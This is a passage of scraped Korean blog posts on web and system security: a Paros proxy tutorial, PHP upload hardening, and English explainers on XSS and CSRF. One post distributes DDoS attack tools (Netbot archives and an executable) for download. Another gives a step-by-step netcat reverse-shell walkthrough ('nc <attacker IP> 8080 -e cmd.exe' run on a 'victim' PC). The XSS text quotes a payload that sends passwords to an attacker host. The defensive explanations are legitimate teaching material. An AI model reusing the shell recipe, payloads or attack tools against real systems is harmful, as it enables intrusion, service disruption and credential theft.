<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"><a href="http://www.parosproxy.org/download.shtml" target="_blank"><ins><font color="#800080">http://www.parosproxy.org/download.shtml</font></ins></a></span>
<br><div class="imageblock center" style="text-align: center; clear: both;"><a class="extensionIcon" href="https://www.youngsam.net/attachment/1239063452.xxx"><img src="https://youngsam.net/resources/image/extension/exe.gif" alt="" /> paros-3.2.13-win.exe</a></div><br><p style="margin: 0cm 0cm 0pt;">
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">2. </span></b><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">설치</span></b>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">파로스 툴은<span> JVM
</span>환경에서 돌아 갑니다<span>.</span></span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">즉 운영체제에 맞는<span>
JDK </span>를 설치 하셔야 합니다<span>.</span></span>
<br>JDK 다운로드 <a href="http://www.oracle.com/technetwork/java/javase/downloads/index.html">http://www.oracle.com/technetwork/java/javase/downloads/index.html</a><br><span style="font-family: 돋움;">그리고<span> Paros
</span>를 설치 하면 됩니다<span>.</span></span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"> </span>
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">3. </span></b><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">환경
설정</span></b>
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">a. </span></b><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">프록시 포트 확인
하기</span></b>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">Paros </span><span style="font-family: 돋움;">를 웹 프록시를 사용 하려면 우선<span> Paros </span>의 포트를 확인 해야
합니다</span> <br>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">아래와 같이 <b style="mso-bidi-font-weight: normal;"><span>Tool > Option</span></b><span>
</span>메뉴로 이동하시면 옵션 창이 나옵니다<span>.</span></span> <b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">Local proxy
</span></b><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">부분에<span> 8080</span></span></b><span style="font-family: 돋움;"> </span><span style="font-family: 돋움;">포트가 웹 프록시로 사용할 포트가
됩니다<span>.</span></span> <br>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">그리고<span> SSL
</span>통신은<span> 8443 </span>포트를 사용합니다<span>. </span></span><br><span style='font-family: 돋움; font-size: 10pt; mso-fareast-language: KO; mso-bidi-font-family: "Times New Roman"; mso-ansi-language: EN-US; mso-font-kerning: 1.0pt; mso-bidi-language: AR-SA;'>이
포트를 사용해도 되고 변경하여도 됩니다<span>.</span></span> </p>
<p style="margin: 0cm 0cm 0pt;" align="left"><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1350229996.gif" width="680" height="510" alt="사용자 삽입 이미지" /></div></p>
<p style="margin: 0cm 0cm 0pt;" align="left"> </p>
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;"><br>b. </span></b><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">웹 브라우저 프록시
설정하기</span></b>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">위에서<span>
Paros</span>의 통신 포트를 확인 하였습니다<span>.</span></span> <br><span style="font-family: 돋움;">이번에는 내 컴퓨터가 인터넷을 이용할 때 프록시로<span> Paros </span>를 사용하겠다고
명시 해야 합니다<span>. <br></span></span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">아래와 같이 <b style="mso-bidi-font-weight: normal;"><span>IE </span>에서 도구<span> > </span>인터넷
옵션<span> > </span>연결<span> > LAN </span>설정</b>으로 들어가서</span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">프록시 주소와 포트를 지정 해
줍니다<span>.</span></span> </p>
<p style="margin: 0cm 0cm 0pt;" align="left"><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1250125683.gif" alt="사용자 삽입 이미지" height="662" width="471" /></div></p>
<p style="margin: 0cm 0cm 0pt;" align="left"> </p>
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">Paros </span></b><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">가 로컬에
있고<span> 8080 </span>포트를 사용하기 때문에 위와 같이 설정 합니다</span></b><span style="font-family: 돋움;">.</span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"> </span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">드디어 프록시 설정이 완료
되었습니다<span>.</span></span> <span style="font-family: 돋움;">이제부터 웹 사이트 서핑시<span>
Paros </span>를 로컬 프록시로 사용할 수 있게 되었습니다<span>.</span></span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"> </span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"> </span>
<p style="margin: 0cm 0cm 0pt;">
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">3. Paros </span></b><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">사용하기</span></b>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">기본적으로<span> Paros
</span>는 웹 요청과 응답 사이에 클라이언트와 서버가 주고 받은</span> <span style="font-family: 돋움;">패킷들에 대한<span> Viewing </span>을
제공합니다<span>.</span></span> <br><span style='font-family: 돋움; font-size: 10pt; mso-fareast-language: KO; mso-bidi-font-family: "Times New Roman"; mso-ansi-language: EN-US; mso-font-kerning: 1.0pt; mso-bidi-language: AR-SA;'>아래
화면은<span> mkex.pe.kr </span>사이트에 접속할 때 <b style="mso-bidi-font-weight: normal;">주고 받은 요청<span>/</span>응답 메시지</b>
입니다<span>.</span></span> <br>
<p style="margin: 0cm 0cm 0pt;" align="left"><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1290128328.gif" width="680" height="524" alt="사용자 삽입 이미지" /></div></p>
<p style="margin: 0cm 0cm 0pt;" align="left"> </p>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">요청 데이터는<span>
Request </span>탭<span>, </span>응답 데이터는<span> Response. </span>탭에 나타납니다</span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">
</span><p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="color: red; font-family: 돋움;">4. </span></b><b style="mso-bidi-font-weight: normal;"><span style="color: red; font-family: 돋움;">요청 중간에 개입 하기</span></b>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">이제 본격적으로<span>
Paros </span>를 사용해서 웹 서버와 통신 중가에 끼어 들어 데이터를 보고</span> <span style="font-family: 돋움;">변조 하는 방법에 대해 알아 봅니다<span>.</span></span> <br>
<p style="margin: 0cm 0cm 0pt;" align="left"><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1084674803.gif" alt="사용자 삽입 이미지" height="523" width="680" /></div></p>
<p style="margin: 0cm 0cm 0pt;" align="left"> </p>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">위 그림을 보시면 <b style="mso-bidi-font-weight: normal;"><span>Trap </span>탭</b>이 바로 이 역할을 할 수 있게
합니다<span>.</span></span>
<p style="margin: 0cm 0cm 0pt;">
<p style="margin: 0cm 0cm 0pt;"><span style="color: red; font-family: 돋움;">중간에<span> Trap request, Trap response
</span>를 체크 하면 요청<span>/</span>응답에 대한 패킷을 정지하여</span> <span style="color: red; font-family: 돋움;">데이터를 보고 변경할 수 있게 합니다</span><span style="font-family: 돋움;">.</span> <span style="color: red; font-family: 돋움;">요청
흐름은<span> Continue </span>버턴을 통해서 하나하나 이루어 집니다</span><span style="font-family: 돋움;">.</span>
<p style="margin: 0cm 0cm 0pt;">
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">이 두 체크를 해제 하면 요청과
응답은 한번에 이루어 지지만 이것이 체크되어 있으면</span> <span style="font-family: 돋움;">요청과 응답은 항상<span> Continue </span>를 클릭할 때 마다 순차적으로 이루어
집니다<span>.</span></span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"> </span>
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">데이터 변조는 이런 식으로 이루어 집니다<span>.</span></span></b> <b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">위 그림에서
여러<span> HTTP </span>헤더가 보이는데 이 중 일부 값을 변경하여 요청을 하는<span> </span></span></b><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">방식
</span></b><span style="font-family: 돋움;">입니다<span>.</span></span> </p><p><strong><a href="https://youngsam.net/entry/paros-3213-winexe-Paros-%EC%9B%B9%ED%94%84%EB%A1%9D%EC%8B%9C-%EC%82%AC%EC%9A%A9%EB%B2%95?commentInput=true#entry1641WriteComment">댓글 쓰기</a></strong></p>디도스 공격 툴 5.3openkrhttps://youngsam.net/entry/%EB%94%94%EB%8F%84%EC%8A%A4-%EA%B3%B5%EA%B2%A9-%ED%88%B4-532011-11-12T15:40:29+09:002011-11-12T14:52:19+09:00<span style="font-size: 10pt;">디도스 공격 툴중에 가장 많이 사용된다는 툴입니다. 아무래도 이제는 인터넷에서 구매까지 할수 있게 되다보니 공격이 더 많아 질수 있겠습니다..<br><br>이미지 출처는 네이버 검색 하였습니다. 어리석은 장난으로 디도스 공격 하지 마시기 바랍니다. 네트워크 방해와 서비스를 방해하는 것도 범죄라는 사실을 아셔야 합니다..<br><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/cache/thumbnail/1/1039895279.w680-h524.jpg" width="680" height="524" alt="사용자 삽입 이미지"/></div><br><div class="imageblock dual" style="text-align: center;"><table cellspacing="5" cellpadding="0" border="0" style="margin: 0 auto;"><tr><td><a class="extensionIcon" href="https://www.youngsam.net/attachment/1025618219.zip"><img src="https://youngsam.net/resources/image/extension/zip.gif" alt="" /> 넷봇8.5.zip</a></td><td><a class="extensionIcon" href="https://www.youngsam.net/attachment/1044863802.zip"><img src="https://youngsam.net/resources/image/extension/zip.gif" alt="" /> 넷봇_2011_조커.zip</a></td></tr></table></div><br>비슷한 관련 툴도 함께 업로드 합니다.<br><br><div class="imageblock dual" style="text-align: center;"><table cellspacing="5" cellpadding="0" border="0" style="margin: 0 auto;"><tr><td><a class="extensionIcon" href="https://www.youngsam.net/attachment/1186655067.rar"><img src="https://youngsam.net/resources/image/extension/unknown.gif" alt="" /> 6688.rar</a></td><td><a class="extensionIcon" href="https://www.youngsam.net/attachment/1237246703.xxx"><img src="https://youngsam.net/resources/image/extension/exe.gif" alt="" /> Cxi12Setup.exe</a></td></tr></table></div></span><p><strong><a href="https://youngsam.net/entry/%EB%94%94%EB%8F%84%EC%8A%A4-%EA%B3%B5%EA%B2%A9-%ED%88%B4-53?commentInput=true#entry521WriteComment">댓글 쓰기</a></strong></p>nc,exe 를 이용한 윈도우 시스템 해킹openkrhttps://youngsam.net/entry/ncexe-%EB%A5%BC-%EC%9D%B4%EC%9A%A9%ED%95%9C-%EC%9C%88%EB%8F%84%EC%9A%B0-%EC%8B%9C%EC%8A%A4%ED%85%9C-%ED%95%B4%ED%82%B92011-11-12T14:45:55+09:002011-11-12T14:45:55+09:00<p>필요한 도구 - 공격자 (HOST) 희생자 (GUEST)<br><br>nc.exe<div class="imageblock center" style="text-align: center; clear: both;"><a class="extensionIcon" href="https://www.youngsam.net/attachment/1186816754.xxx"><img src="https://youngsam.net/resources/image/extension/exe.gif" alt="" /> nc.exe</a></div></p><p><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1356909717.png" width="668" height="431" alt="사용자 삽입 이미지" /></div></p><p>1. 공격자 pc에서 nc -l -p 8080 </p><p>을 입력후 대기한다</p><p><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1322527669.png" width="669" height="438" alt="사용자 삽입 이미지" /></div></p><p>그리고 희생자 pc에서 nc xxx.xxx.xxx.xxx. 8080 -e cmd.exe 를 입력한다</p><p>여기서 IP는 공격자의 IP를 입력한다</p><p><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1159901328.png" alt="사용자 삽입 이미지" height="431" width="668" /></div></p><p>다시 공격자 pc로 와서 쉘을 확인하면</p><p>그림과 같이 접속되서 cmd 명령이 실행되어있음을 보여준다</p><p><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/attach/1/1184872055.jpg" alt="사용자 삽입 이미지" height="431" width="668" /></div></p><br /><p>희생자 pc에서 폴더생성도 가능하다</p><br /><p><div class="imageblock center" style="text-align: center; clear: both;"><img src="https://youngsam.net/cache/thumbnail/1/1018449998.w680-h389.jpg" width="680" height="389" alt="사용자 삽입 이미지"/></div></p><p>보시다시피 mkdir 로 폴더생성하면 희생자 pc 쪽에서 폴더가 생성됨을 볼수있다</p><br /><br /><p><strong><a href="https://youngsam.net/entry/ncexe-%EB%A5%BC-%EC%9D%B4%EC%9A%A9%ED%95%9C-%EC%9C%88%EB%8F%84%EC%9A%B0-%EC%8B%9C%EC%8A%A4%ED%85%9C-%ED%95%B4%ED%82%B9?commentInput=true#entry1640WriteComment">댓글 쓰기</a></strong></p>[보안] 파일업로드와 관련된 보안 정리openkrhttps://youngsam.net/entry/%EB%B3%B4%EC%95%88-%ED%8C%8C%EC%9D%BC%EC%97%85%EB%A1%9C%EB%93%9C%EC%99%80-%EA%B4%80%EB%A0%A8%EB%90%9C-%EB%B3%B4%EC%95%88-%EC%A0%95%EB%A6%AC2011-10-24T12:17:48+09:002011-10-24T12:17:48+09:00이곳에 올려진 파일업로드와 관련되어 나온 보안 해결책에 대해 정리해 봤습니다.<br><br>첫째,<br>PHP 파일업로드 후 스크립트 실행에 대한 해결책..<br><br>$UPfile = "$upload_name.zip"; // 업로드된 원래 파일뒤에 .zip 포함<br>$F = opendir("./data") or die(error("./data 디렉토리를 열수 없습니다"));<br><br><br><br>while($existF = readdir($F)) {<br><br> if (file_exists("./data/$UPfile")) {<br> $y++;<br> $UPfile = "$upload_name@$y.zip"; <br> // 같은이름이 존재하면 @번호 형식으로 파일명 변경<br>}<br><br>}<br><br>closedir($F);<br><br>$tfile = substr($UPfile,0,-4); // .zip을 뺀 파일명 DB에 저장<br><br>copy($upload,"./data/$UPfile") or die(error("파일 저장에 오류가 있습니다"));<br><br>실제로 저장되어 있는 파일명은 .zip 으로 되어있어서 실행이 불가능하며<br>무조건적으로 다운됩니다.<br><br>다운로드시 Header 함수 사용<br><br>$filename = "./data/$file.zip"; // 저장되어 있는 파일명 <br>$filesize = filesize($filename); // 저장되어 있는 파일의크기 <br>$Tfile = explode("@",$file); // 원래 파일명 반환<br>Header("Content-Type: application/zip"); <br>Header("Content-Disposition: inline; filename=$Tfile[0]"); <br>Header("Content-Length: $filesize"); <br>Header("Pragma: no-cache"); <br>Header("Expires: 0"); <br>$fp=fopen("$filename", "r"); <br>echo fread($fp, $filesize); <br>fclose($fp); <br><br>둘째,<br>GET 방식으로 변수전달하여 서버내의 파일을 다운로드 하는 문제와<br>사용자가 파일전송폼의 HTML 문서를 사용자의 PC에 저장하여 <br>POST 방식으로 변수전달할경우<br><br>if (!eregi("http://$HTTP_HOST",$HTTP_REFERER) or $QUERY_STRING) { <br> echo("정상적인 접근 바랍니다"); <br>exit;<br>}<br><p><strong><a href="https://youngsam.net/entry/%EB%B3%B4%EC%95%88-%ED%8C%8C%EC%9D%BC%EC%97%85%EB%A1%9C%EB%93%9C%EC%99%80-%EA%B4%80%EB%A0%A8%EB%90%9C-%EB%B3%B4%EC%95%88-%EC%A0%95%EB%A6%AC?commentInput=true#entry1617WriteComment">댓글 쓰기</a></strong></p>[보안] 악성 스크립트 쉘 체크하기openkrhttps://youngsam.net/entry/%EB%B3%B4%EC%95%88-%EC%95%85%EC%84%B1-%EC%8A%A4%ED%81%AC%EB%A6%BD%ED%8A%B8-%EC%89%98-%EC%B2%B4%ED%81%AC%ED%95%98%EA%B8%B02011-10-23T12:03:44+09:002011-10-23T12:03:44+09:00PC 에서 바이러스 체크하는것처럼 바이러스 체크 프로그램으로 검사 하는겁니다.<br><br>리눅스 서버의 경우<br><br>일단 삼바서버를 띄운다음 노트북이나 클라이언트로 로컬로 붙입니다.<br><br>네트웍 드라이브를 잡아 알약 같은 프로그램으로 검사 하는겁니다.<br><br>다운받은 각종 유틸 , 동영상, 소스를 서버에 옮기다보니<br>여기저기 실시간 검색에서 튀어나온 트로이목마들이 많이 발견되더군요.<br><br>로컬망을 기가바이트 허브와 각 호스트에 기가바이트 랜카드를 연결하고<br>CAT6 망으로 바꾸니 복사 속도가 대략 10배나 빨라졌네요.<br><br>동영상 큰 파일은 초당 100메가<br>소스같은 작은 파일은 30메가 정도 나오더군요.<br><br>이정도 속도면 SATA 하드를 직접 메인보드에 연결하여 복사하는 속도랑 맞먹습니다. <!-- 테러 태그 방지용 --><p><strong><a href="https://youngsam.net/entry/%EB%B3%B4%EC%95%88-%EC%95%85%EC%84%B1-%EC%8A%A4%ED%81%AC%EB%A6%BD%ED%8A%B8-%EC%89%98-%EC%B2%B4%ED%81%AC%ED%95%98%EA%B8%B0?commentInput=true#entry1615WriteComment">댓글 쓰기</a></strong></p>Cross-Site Scriptingopenkrhttps://youngsam.net/entry/Cross-Site-Scripting2011-09-14T02:19:43+09:002011-09-14T02:19:43+09:00<h1>Cross-Site Scripting</h1><p>Cross-site scripting ('XSS' or 'CSS') is an attack that takes advantage of a Web site vulnerability in which the site displays content that includes un-sanitized user-provided data. For example, an attacker might place a hyperlink with an embedded malicious script into an online discussion forum. That purpose of the malicious script is to attack other forum users who happen to select the hyperlink. For example it could copy user cookies and then send those cookies to the attacker.</p><h2>Details</h2><p>Web sites today are more complex than ever and often contain dynamic content to enhance the user experience. Dynamic content is achieved through the use of Web applications that can deliver content to a user according to their settings and needs.</p><p> While performing different user customizations and tasks, many sites take input parameters from a user and display them back to the user, usually as a response to the same page request. Examples of such behavior include the following.</p><ul class="arrow"><li>Search engines which present the search term in the title ("Search Results for: search_term")</li><li>Error messages which contain the erroneous parameter</li><li>Personalized responses ("Hello, username")</li></ul><p> Cross-site scripting attacks occur when an attacker takes advantage of such applications and creates a request with malicious data (such as a script) that is later presented to the user requesting it. The malicious content is usually embedded into a hyperlink, positioned so that the user will come across it in a web site, a Web message board, an email, or an instant message. If the user then follows the link, the malicious data is sent to the Web application, which in turn creates an output page for the user, containing the malicious content. The user, however, is normally unaware of the attack, and assumes the data originates from the Web server itself, leading the user to believe this is valid content from the Web site.</p><p> For example, consider a Web application that requires users to log in to visit an authorized area. When users wish to view the authorized area, they provide their username and password, which is then checked against a user database table. Now, assume that this login system contains two pages: Login.asp, which created a form for the users to enter their username and password; and the page CheckCredentials.asp, which checks if the supplied username/password are valid. If the username/password are invalid, CheckCredentials.asp uses (for example), a Response.Redirect to send the user back to Login.asp, including an error message string in the query string . The Response.Redirect call will be something like the following.</p><pre>Response.Redirect("Login.asp?ErrorMessage=Invalid+username+or+password")
</pre><p> Then, in Login.asp, the error message query string value would be displayed as follows:</p><pre><img alt="" src="http://www.imperva.com/images/glossary/css_form1.png"></pre><p>Using this technique, when users attempt to login with an invalid username or password, they are returned to Login.asp and a short message is displayed indicating that their username/password were invalid. By changing the ErrorMessage value, an attacker can embed malicious JavaScript code into the generated page, causing execution of the script on the computer of the user viewing the site. For example, assume that Login.asp is being called using the following URL.</p><pre>http://www.somesite.com/Login.asp?ErrorMessage=</pre><p>As in the code for Login.asp, the ErrorMessage query string value will be emitted, producing the following HTML page:</p><pre><img alt="" src="http://www.imperva.com/images/glossary/css_form2.png"></pre><p>The attacker embedded HTML code into this page in such a way that when users browse this page, their supplied username and password are submitted to the following page.</p><pre>http://www.hax0r.com/stealPassword.asp
</pre><p>An attacker can send a link to the contrived page via an email message or a link from some message board site, hoping that a user will click on the link and attempt to login. Of course, by attempting to login, the user will be submitting his username and password to the attacker's site.</p><h2>Prevention</h2><p>Cross-site scripting is one of the easiest attacks to detect, yet many Intrusion Prevention Systems fail to do so. The reason why cross-site scripting can be easily detected is that unlike most application level attacks, cross-site scripting can be detected using a signature. The simple text pattern <script" to="" stream="" contains="" can="" be="" used="" attacks.="" However,="" trying="" detect="" that="" pattern="" on="" entire="" would="" yield="" high="" rate="" false="" positives.="" For="" example,="" the="" outbound="" HTTP="" legitimate="" instances="" of="" cross-site="" scripting="" (client="" side="" scripts).="" <="" p=""></script"><p>To accurately detect cross-site scripting attacks the product must know where and when to look for that signature. Most cross-site scripting attacks occur either with error pages or with parameter values. Therefore the product needs to look for cross-site scripting signatures either within parameter values or within requests that return error messages. To look for signatures in parameters values the product must parse the URL correctly and retrieve the value part and then search for the signature on the value while overcoming encoding issues. To look for signatures in pages that return error messages the product needs to know that the specific URL returned an error code. Intrusion Detection and Prevention Systems which are not Web application oriented simply do not implement these very advanced capabilities.</p><p><strong><a href="https://youngsam.net/entry/Cross-Site-Scripting?commentInput=true#entry1549WriteComment">댓글 쓰기</a></strong></p>What is cross site scriptingopenkrhttps://youngsam.net/entry/What-is-cross-site-scripting2011-09-14T02:17:46+09:002011-09-14T02:17:46+09:00<h2 id="xss">What is cross site scripting</h2><p>Cross site scripting (XSS) is where one site manages to run a script on another site, with the privileges of you, the user.</p><p>In many pages, this would be completely harmless. But now imagine that you have logged into site A, and that site has used a session cookie to store your identity. If site B manages to make you load a page on site A containing a script they have injected into it, that script could take the cookie for site A, and send it to site B. The person running site B can now use your cookie in their own browser, and can now use site A, making it think they are you.</p><p>In the case of site A being a blog or forum, they could erase or alter your posts, add new abusive posts, or erase your account. In the case of Web mail systems, they could send abusive email to your colleagues, delete any emails, or read all the passwords you have been sent in your email, which may give them access to even more systems. In the case of it being a banking site, they could make large cash transactions using your bank account. In the case of banking or shopping sites, they could obtain your banking details, and use them to make their own purchases.</p><p>XSS can also be a problem from users on shared sites, such as forums or blog comments, where users may find a way to inject scripts into page content, where the exploit can survive much longer than just a single page load.</p><p>Cookies are not the only target of cross site scripting, but they are a very easy way to exploit a simple mistake made by the site author. In some cases, it may be possible to inject a script onto the login form of the site, and convince you to fill it in, and then they can make it send them your password. Or they could simply make it load another page on the site, submitting form data to it, or using other means to perform actions on your behalf.</p><p>Unlike phishing scams where a site tries to trick users into thinking it is another site, XSS <em>is</em> the real site, not a fake. It has just allowed another site to run a script on it, in the context of one of its users.</p><h2 id="xsrf">What is cross site request forgery</h2><p>Cross Site Request Forgery (XSRF or CSRF), also known as Cross Site Reference Forgery, is similar in some respects to XSS, but very different in one important respect. It does not rely at all on being able to inject a script. It is more unreliable, but its effects can be just as damaging.</p><p>The general idea of XSRF is that while you are logged into site A, you also look at a page on site B. Site B is evil, and submits form data to site A, or requests Web pages from site A using some other means. Since you are logged into site A, it uses the form data as if you yourself sent it. That may then do all of the same things as XSS attacks, such as creating forum posts, or making bank transactions.</p><p>Having strong passwords that cannot be guessed or calculated is always a good idea, but XSRF (and XSS) bypasses that part of the protection, as it works once the user has logged themself into the site using their strong password.</p><h2 id="blame">Who is to blame</h2><p>Blame is a fairly harsh word, since it is the attacking site B that is really to blame, but evil sites are a fact of life, and site A should protect its users. XSS in particular is always the result of a mistake on the part of the site with the vulnerability. XSS is also worryingly common, many sites make the basic mistakes that allow XSS attacks.</p><h2 id="userprotect">How can users protect themselves</h2><p>Most users are not even aware that XSS and XSRF are possible. And they should not need to be. Users should not be expected to be security experts - if they were, you as a Web developer would be out of a job. However, users who wish to protect themselves can take a few steps to do so.</p><p>The basic step is to never open other sites while you are logged into a site. This means that while you are logged into your bank, shopping site, blog, forum, web mail, side admin section, etc., never open another site in any window. Do not click links in emails, or other applications. If you use Internet Explorer (I recommend against this if you value your security), do not run programs like Word (that includes opening attachments in email), or generally any other programs that view Web pages, as many Windows programs use the Internet Explorer engine either directly or via macros, and may be used as a vector for these attacks.</p><p>If the site uses cookies to log you in, make sure you <em>log out</em> when you are finished using it. If the site does not allow you to log out, or if it uses HTTP authentication, then restart your browser. If the site uses a cookie based login but not session cookies, and does not allow you to log out, then you may find that your browser allows you to delete those cookies manually.</p><p>The next step is to disable JavaScript while logged into a site. This may seem like a drastic measure, but it will protect against virtually all XSS (but not XSRF) attacks. Unfortunately, many sites will not allow you to use them without JavaScript, so this step may not be possible. If the site is important enough, such as a bank, but still does not allow you to disable JavaScript, then I suggest you use a different bank.</p><p>You may also want to disable iframes if your browser (such as Opera) allows that. This step should not be necessary as long as you do not browse other sites at the same time, but if you do, it makes it a little harder for XSRF attacks to be carried out, as most (but by no means all) of them use iframes.</p><p>All of these measures are extremely limiting, and certainly not something most users would want to do. So the final step will always be the one that is preferred: Make sure the sites you log into have actually checked their sites for XSS and XSRF attacks. Not just that they are aware that they exist, or believe they are safe, but that they have actually run checks to make sure they are protected against those attacks.</p><h3 id="logintype">How do you know what type of login a site is using</h3><p>Cookie logins are fairly easy to identify. They are almost always what can be seen as a form on a Web page, asking you for a username or email address and password. HTTP authentication (or similar types of authentication) are shown as a dialog that appears in its own little dialog window in front of the Web page, asking you for a username and password.</p><p>Shopping sites almost always use either a cookie or a URL encoded session ID, and virtually never use HTTP authentication. In general, you can tell which they are using by looking at the page address. If it contains a large amount of seemingly random characters (usually near the end of the address), then it is probably using a URL encoded session ID. Otherwise it will be using a cookie.</p><p>Working out if a cookie is a session cookie or not is a little harder. Some browsers may allow you to see the properties of stored cookies, or to prompt for them with their details when the server tries to set them. However, a simple test is to log into the site, then without logging out, close all browser windows, then restart the browser, and try reloading pages on the site. If you are still logged in, then it is not a session cookie.</p><p>There are some alternative types of login, such as using a client certificate (which you will normally have been asked to install at some point), or IP based authentications (typically used on local intranets). It is not normally possible to log out from either of these, even by restarting your browser. In general, you can identify these either because you had been asked to install a client certificate (not a normal root certificate), or because you never had to log in in the first place.</p><h2 id="protectweb">How can Web sites protect themselves</h2><p>These are very complex issues, and there are no simple solutions, but there are certain things that the site should always do. In almost all cases, it is server side scripting that needs to be changed or fixed.</p><h3 id="xssprotect">Cross site scripting</h3><p>This is by far one of the most common mistakes made by Web authors, and turns up on a substantially high number of sites - even those you would expect to be written by knowledgeable authors. Some even dismiss these mistakes as harmless, or trivial, ignoring the dangers of what those mistakes can present.</p><p>The vulnerabilities themselves are not almost never created by sites having poorly written JavaScripts. XSS vulnerabilities are usually caused by a server side script that allows another site to put a new and dangerous JavaScript on the page. A site does not need to have any JavaScripts of its own for it to be vulnerable to XSS attacks.</p><p>Let us take this simple example; somewhere on a site, there is a form that a user can fill in. If they fill it in with invalid details, the form is displayed again, with what they typed last time shown in the the form inputs, allowing them to change whatever was wrong. This is often done with login forms, although it could in fact be any form on the site while they are logged in. On its own, this is not dangerous at all, and is in fact a very good thing.</p><p>The problem is that some sites forget to escape the data before putting it back into the form. Assume that the form had this:</p><pre><code><input name="foo" value=""></code></pre><p>Now assume that the site displays it to the user like this (I will use PHP here, but it could in fact be any server side language):</p><pre><code><input name="foo" value="<?php
print $foo;
?>"></code></pre><p>With that single, simple <var>print</var> command, the site has opened itself up to XSS attacks. Imagine now that the evil site uses an iframe, link, image URL or form submission to the url:</p><pre><code>http://goodsite.com/sillypage.php?foo=%22%3E%3Cscript%3Einsert-evil-script-here%3C/script%3E%3C%22</code></pre><p>The server side script would then create this in the page source code:</p><pre><code><input name="foo" value=""><script>insert-evil-script-here</script><""></code></pre><p>The implications of this are immediately obvious. The evil script could then load other pages on the site using XMLHttpRequest, even taking any URL encoded session ID into account, and in doing so it could add or change data, or make form submissions, etc. It could also read any session cookies, and send them back to the evil site as part of a URL using an iframe, image, script, stylesheet, or just about any type of external content. The possibilities are fairly limitless. This simple change would have protected the site:</p><pre><code><input name="foo" value="<?php
print htmlspecialchars($foo);
?>"></code></pre><p>Although forms are the most common place where this happens, it is not the only time this can be a problem. The same situation occurs if a site writes unescaped content as part of any page content - for example, many pages use a single page that writes whatever information it was passed as a page heading.</p><pre><code>sillypage.php?content=%3Ch1%3EPage%203%3C/h1%3E</code></pre><p>Note that even if scripting is prevented by other means, an attack could, for example, display a false login form to the user, that sends the details to another site. They could also display misleading information. Though not as harmful as a XSS vulnerability, as it needs the user to be tricked into following those instructions, this is still a problem that needs to be prevented.</p><h4 id="escapedata">Escaping data</h4><p>So the solution is to ensure that if contents like this are entered into the form, that the server side script escapes them before adding them to the page content. HTML offers a simple way to escape these; use HTML entities for < >& and " characters. Yes, for virtually all situations, this really is all it takes. PHP offers a simple function to do this; <var>htmlspecialchars</var>. Other languages sometimes offer ways to do this, but some do not. One of the big offenders is JSP which, to my knowledge, has no equivalent method. Authors simply do not realise they should create one for themselves. Many JSP pages are left open to XSS attacks as a result.</p><p>It is not enough to escape just < and > characters, since quotes can be just as damaging inside an attribute. If quotes are not escaped, the attribute can be ended, and a new event handler attribute started, that triggers when the user clicks it, or focuses it, or moves their mouse over it. If you are putting the content inside an attribute, make sure the attribute uses " (double) quotes, or the attribute could also be ended simply by including a space (if using ' [single] quotes around the attribute value, make sure you tell PHP's <var>htmlspecialchars</var> function to convert those as well inside the attribute value).</p><p>Form data must also be escaped before using it as part of a database query, typically by putting backslashes before quotes (again, PHP has inbuilt methods for doing this). Failure to escape it could allow people to end the query, and start a second one, deleting random data, corrupting databases, or at worst, being able to run 